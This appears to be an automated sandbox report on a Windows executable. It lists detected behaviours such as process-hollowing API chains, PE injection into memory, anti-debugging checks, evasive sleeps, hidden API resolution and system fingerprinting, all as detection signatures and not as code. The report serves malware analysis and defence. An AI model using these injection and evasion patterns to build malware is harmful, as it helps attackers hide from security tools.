Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 8_2_00417F5C CreateProcessA,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,WaitForSingleObject,TerminateThread,CloseHandle,VirtualFree,TerminateProcess,8_2_00417F5C
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 9_2_0028E080 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualAlloc,ReadProcessMemory,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,9_2_0028E080
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 10_2_00417F5C CreateProcessA,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,WaitForSingleObject,TerminateThread,CloseHandle,VirtualFree,TerminateProcess,10_2_00417F5C
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 11_2_001AE080 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualAlloc,ReadProcessMemory,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,11_2_001AE080
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 12_2_00417F5C CreateProcessA,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,WaitForSingleObject,TerminateThread,CloseHandle,VirtualFree,TerminateProcess,12_2_00417F5C
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 13_2_002DE080 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualAlloc,ReadProcessMemory,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,13_2_002DE080
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 14_2_00417F5C CreateProcessA,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,WaitForSingleObject,TerminateThread,CloseHandle,VirtualFree,TerminateProcess,14_2_00417F5C
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 15_2_0020E080 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualAlloc,ReadProcessMemory,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,15_2_0020E080
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 16_2_00417F5C CreateProcessA,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,WaitForSingleObject,TerminateThread,CloseHandle,VirtualFree,TerminateProcess,16_2_00417F5C
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 17_2_0037E080 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualAlloc,ReadProcessMemory,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,17_2_0037E080
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 18_2_00417F5C CreateProcessA,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,WaitForSingleObject,TerminateThread,CloseHandle,VirtualFree,TerminateProcess,18_2_00417F5C
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 19_2_0018E080 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualAlloc,ReadProcessMemory,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,19_2_0018E080
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 20_2_00417F5C CreateProcessA,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,WaitForSingleObject,TerminateThread,CloseHandle,VirtualFree,TerminateProcess,20_2_00417F5C
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 21_2_0024E080 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualAlloc,ReadProcessMemory,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,21_2_0024E080
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 22_2_00417F5C CreateProcessA,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,WaitForSingleObject,TerminateThread,CloseHandle,VirtualFree,TerminateProcess,22_2_00417F5C
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 23_2_0020E080 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualAlloc,ReadProcessMemory,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,23_2_0020E080
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 24_2_00417F5C CreateProcessA,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,WaitForSingleObject,TerminateThread,CloseHandle,VirtualFree,TerminateProcess,24_2_00417F5C
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 25_2_0027E080 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualAlloc,ReadProcessMemory,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,25_2_0027E080
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 26_2_00417F5C CreateProcessA,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,WaitForSingleObject,TerminateThread,CloseHandle,VirtualFree,TerminateProcess,26_2_00417F5C
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 27_2_0024E080 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualAlloc,ReadProcessMemory,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,27_2_0024E080
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 28_2_00417F5C CreateProcessA,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,WaitForSingleObject,TerminateThread,CloseHandle,VirtualFree,TerminateProcess,28_2_00417F5C
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 29_2_0027E080 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualAlloc,ReadProcessMemory,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,29_2_0027E080
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 30_2_00417F5C CreateProcessA,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,WaitForSingleObject,TerminateThread,CloseHandle,VirtualFree,TerminateProcess,30_2_00417F5C
Found potential string decryption / allocating functionsShow sources
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: String function: 00405CF0 appears 90 times
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: String function: 00411DBC appears 105 times
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: String function: 00401268 appears 60 times
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: String function: 004118D4 appears 105 times
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: String function: 0040A628 appears 45 times
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: String function: 00407F03 appears 45 times
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: String function: 00217214 appears 33 times
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: String function: 0040CA14 appears 315 times
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: String function: 03005030 appears 38 times
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: String function: 0021589C appears 54 times
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: String function: 0040539C appears 75 times
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: String function: 00404194 appears 60 times
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: String function: 00401314 appears 75 times
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: String function: 004038E8 appears 105 times
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: String function: 00403894 appears 60 times
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: String function: 0040F48C appears 45 times
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: String function: 00281D0C appears 42 times
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: String function: 00405A90 appears 150 times
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: String function: 0040346C appears 210 times
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: String function: 0040450C appears 105 times
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: String function: 00211D0C appears 42 times
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: String function: 00287214 appears 33 times
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: String function: 00405C80 appears 255 times
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: String function: 0025589C appears 36 times
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: String function: 00403EAC appears 405 times
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: String function: 0028589C appears 54 times
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: String function: 004111AC appears 45 times
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: String function: 00403114 appears 105 times
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: String function: 00408974 appears 165 times
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: String function: 0040DB18 appears 165 times
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: String function: 00405C78 appears 45 times
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: String function: 0040345C appears 45 times
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: String function: 00403E88 appears 1095 times
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: String function: 00401260 appears 45 times
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: String function: 00406EFC appears 60 times
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: String function: 0029589C appears 36 times

HIPS / PFW / Operating System Protection Evasion:

barindex
Contains functionality to inject code into remote processesShow sources
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 1_2_0027E080 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualAlloc,ReadProcessMemory,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,1_2_0027E080
Injects a PE file into a foreign processesShow sources
Source: C:\Users\user\Desktop\obtG43AWHP.exeMemory written: C:\Users\user\Desktop\obtG43AWHP.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\obtG43AWHP.exeMemory written: C:\Users\user\Desktop\obtG43AWHP.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\obtG43AWHP.exeMemory written: C:\Users\user\Desktop\obtG43AWHP.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\obtG43AWHP.exeMemory written: C:\Users\user\Desktop\obtG43AWHP.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\obtG43AWHP.exeMemory written: C:\Users\user\Desktop\obtG43AWHP.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\obtG43AWHP.exeMemory written: C:\Users\user\Desktop\obtG43AWHP.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\obtG43AWHP.exeMemory written: C:\Users\user\Desktop\obtG43AWHP.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\obtG43AWHP.exeMemory written: C:\Users\user\Desktop\obtG43AWHP.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\obtG43AWHP.exeMemory written: C:\Users\user\Desktop\obtG43AWHP.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\obtG43AWHP.exeMemory written: C:\Users\user\Desktop\obtG43AWHP.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\obtG43AWHP.exeMemory written: C:\Users\user\Desktop\obtG43AWHP.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\obtG43AWHP.exeMemory written: C:\Users\user\Desktop\obtG43AWHP.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\obtG43AWHP.exeMemory written: C:\Users\user\Desktop\obtG43AWHP.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\obtG43AWHP.exeMemory written: C:\Users\user\Desktop\obtG43AWHP.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\obtG43AWHP.exeMemory written: C:\Users\user\Desktop\obtG43AWHP.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\obtG43AWHP.exeMemory written: C:\Users\user\Desktop\obtG43AWHP.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\obtG43AWHP.exeMemory written: C:\Users\user\Desktop\obtG43AWHP.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\obtG43AWHP.exeMemory written: C:\Users\user\Desktop\obtG43AWHP.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\Microsoft\DirectX\nthost.exeMemory written: C:\Users\user\AppData\Roaming\Microsoft\DirectX\nthost.exe base: 400000 value starts with: 4D5A
Modifies the context of a thread in another process (thread injection)Show sources
Source: C:\Users\user\Desktop\obtG43AWHP.exeThread register set: target process: 3120

Anti Debugging:

barindex
Contains functionality to register its own exception handlerShow sources
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 1_2_03003F30 SetUnhandledExceptionFilter,1_2_03003F30
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 1_2_03003CD8 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_03003CD8
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 1_2_03006BA0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_03006BA0
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 2_2_03003CD8 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_03003CD8
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 2_2_03006BA0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_03006BA0
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 2_2_03003F30 SetUnhandledExceptionFilter,2_2_03003F30
Contains functionality to check if a debugger is running (IsDebuggerPresent)Show sources
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 1_2_03003CD8 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_03003CD8
Contains functionality to dynamically determine API callsShow sources
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 1_2_030073AC LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,1_2_030073AC
Contains functionality to read the PEBShow sources
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 1_2_0027DFB2 push dword ptr fs:[00000030h]1_2_0027DFB2
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 3_2_0029DFB2 push dword ptr fs:[00000030h]3_2_0029DFB2
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 5_2_0020DFB2 push dword ptr fs:[00000030h]5_2_0020DFB2
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 7_2_0028DFB2 push dword ptr fs:[00000030h]7_2_0028DFB2
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 9_2_0028DFB2 push dword ptr fs:[00000030h]9_2_0028DFB2
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 11_2_001ADFB2 push dword ptr fs:[00000030h]11_2_001ADFB2
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 13_2_002DDFB2 push dword ptr fs:[00000030h]13_2_002DDFB2
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 15_2_0020DFB2 push dword ptr fs:[00000030h]15_2_0020DFB2
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 17_2_0037DFB2 push dword ptr fs:[00000030h]17_2_0037DFB2
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 19_2_0018DFB2 push dword ptr fs:[00000030h]19_2_0018DFB2
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 21_2_0024DFB2 push dword ptr fs:[00000030h]21_2_0024DFB2
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 23_2_0020DFB2 push dword ptr fs:[00000030h]23_2_0020DFB2
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 25_2_0027DFB2 push dword ptr fs:[00000030h]25_2_0027DFB2
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 27_2_0024DFB2 push dword ptr fs:[00000030h]27_2_0024DFB2
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 29_2_0027DFB2 push dword ptr fs:[00000030h]29_2_0027DFB2

Malware Analysis System Evasion:

barindex
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 2_2_00404E08 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,2_2_00404E08
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 4_2_00404E08 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,4_2_00404E08
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 6_2_00404E08 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,6_2_00404E08
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 8_2_00404E08 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,8_2_00404E08
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 10_2_00404E08 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,10_2_00404E08
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 12_2_00404E08 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,12_2_00404E08
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 14_2_00404E08 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,14_2_00404E08
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 16_2_00404E08 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,16_2_00404E08
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 18_2_00404E08 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,18_2_00404E08
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 20_2_00404E08 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,20_2_00404E08
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 22_2_00404E08 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,22_2_00404E08
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 24_2_00404E08 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,24_2_00404E08
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 26_2_00404E08 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,26_2_00404E08
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 28_2_00404E08 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,28_2_00404E08
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 30_2_00404E08 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,30_2_00404E08
Contains functionality to query system informationShow sources
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 2_2_0041844E GetSystemInfo,2_2_0041844E
Program exit pointsShow sources
Source: C:\Users\user\Desktop\obtG43AWHP.exeAPI call chain: ExitProcess graph end nodegraph_1-19518
Source: C:\Users\user\Desktop\obtG43AWHP.exeAPI call chain: ExitProcess graph end nodegraph_1-18629
Source: C:\Users\user\Desktop\obtG43AWHP.exeAPI call chain: ExitProcess graph end nodegraph_1-19034
Source: C:\Users\user\Desktop\obtG43AWHP.exeAPI call chain: ExitProcess graph end nodegraph_1-19038
Source: C:\Users\user\Desktop\obtG43AWHP.exeAPI call chain: ExitProcess graph end nodegraph_1-19161
Source: C:\Users\user\Desktop\obtG43AWHP.exeAPI call chain: ExitProcess graph end nodegraph_2-17672
Source: C:\Users\user\Desktop\obtG43AWHP.exeAPI call chain: ExitProcess graph end nodegraph_2-17610
Source: C:\Users\user\Desktop\obtG43AWHP.exeAPI call chain: ExitProcess graph end nodegraph_4-14048
Source: C:\Users\user\Desktop\obtG43AWHP.exeAPI call chain: ExitProcess graph end nodegraph_6-14048
Source: C:\Users\user\Desktop\obtG43AWHP.exeAPI call chain: ExitProcess graph end nodegraph_8-14048
Source: C:\Users\user\Desktop\obtG43AWHP.exeAPI call chain: ExitProcess graph end nodegraph_10-14048
Source: C:\Users\user\Desktop\obtG43AWHP.exeAPI call chain: ExitProcess graph end nodegraph_12-14048
Source: C:\Users\user\Desktop\obtG43AWHP.exeAPI call chain: ExitProcess graph end nodegraph_14-14048
Source: C:\Users\user\Desktop\obtG43AWHP.exeAPI call chain: ExitProcess graph end nodegraph_16-14048
Source: C:\Users\user\Desktop\obtG43AWHP.exeAPI call chain: ExitProcess graph end nodegraph_18-14048
Source: C:\Users\user\Desktop\obtG43AWHP.exeAPI call chain: ExitProcess graph end nodegraph_20-14048
Source: C:\Users\user\Desktop\obtG43AWHP.exeAPI call chain: ExitProcess graph end nodegraph_22-14048
Source: C:\Users\user\Desktop\obtG43AWHP.exeAPI call chain: ExitProcess graph end nodegraph_24-14048
Source: C:\Users\user\Desktop\obtG43AWHP.exeAPI call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\obtG43AWHP.exeAPI call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\obtG43AWHP.exeAPI call chain: ExitProcess graph end node
Found evasive API chain (may stop execution after checking a module file name)Show sources
Source: C:\Users\user\Desktop\obtG43AWHP.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_1-18709
Found large amount of non-executed APIsShow sources
Source: C:\Users\user\Desktop\obtG43AWHP.exeAPI coverage: 4.4 %
Source: C:\Users\user\Desktop\obtG43AWHP.exeAPI coverage: 6.7 %
Source: C:\Users\user\Desktop\obtG43AWHP.exeAPI coverage: 6.7 %
Source: C:\Users\user\Desktop\obtG43AWHP.exeAPI coverage: 6.7 %
Source: C:\Users\user\Desktop\obtG43AWHP.exeAPI coverage: 6.7 %
Source: C:\Users\user\Desktop\obtG43AWHP.exeAPI coverage: 6.7 %
Source: C:\Users\user\Desktop\obtG43AWHP.exeAPI coverage: 6.7 %
Source: C:\Users\user\Desktop\obtG43AWHP.exeAPI coverage: 6.7 %
Source: C:\Users\user\Desktop\obtG43AWHP.exeAPI coverage: 6.7 %
Source: C:\Users\user\Desktop\obtG43AWHP.exeAPI coverage: 6.7 %
Source: C:\Users\user\Desktop\obtG43AWHP.exeAPI coverage: 6.7 %
Source: C:\Users\user\Desktop\obtG43AWHP.exeAPI coverage: 6.7 %
Source: C:\Users\user\Desktop\obtG43AWHP.exeAPI coverage: 6.7 %
Source: C:\Users\user\Desktop\obtG43AWHP.exeAPI coverage: 6.7 %
Source: C:\Users\user\Desktop\obtG43AWHP.exeAPI coverage: 6.7 %
May sleep (evasive loops) to hinder dynamic analysisShow sources
Source: C:\Windows\explorer.exe TID: 3720Thread sleep time: -60000s >= -60s

Hooking and other Techniques for Hiding and Protection:

barindex
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Users\user\Desktop\obtG43AWHP.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\obtG43AWHP.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\obtG43AWHP.exeProcess information set: NOOPENFILEERRORBOX
Extensive use of GetProcAddress (often used to hide API calls)Show sources
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 2_2_00417A70 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_00417A70

Language, Device and Operating System Detection:

barindex
Contains functionality to query local / system timeShow sources
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 1_2_0300521F GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,1_2_0300521F
Contains functionality to query windows versionShow sources
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 2_2_0040AD2C GetVersionExA,2_2_0040AD2C
Queries the cryptographic machine GUIDShow sources
Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Contains functionality locales information (e.g. system language)Show sources
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: _strlen,ShellExecuteA,ShellAboutW,ExtractIconA,GetColorSpace,GetLogColorSpaceA,ChoosePixelFormat,SetICMMode,GetPrivateProfileSectionNamesA,GetCalendarInfoW,GetLocaleInfoW,GetModuleHandleW,LocalAlloc,VirtualProtect,GetTickCount,1_2_0300966F
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,2_2_00404FC0
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,2_2_004050CC
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,2_2_0040587A
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,GetACP,2_2_0040B2B4
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,2_2_00409DB0
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,2_2_0040587C
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,2_2_00409DFC
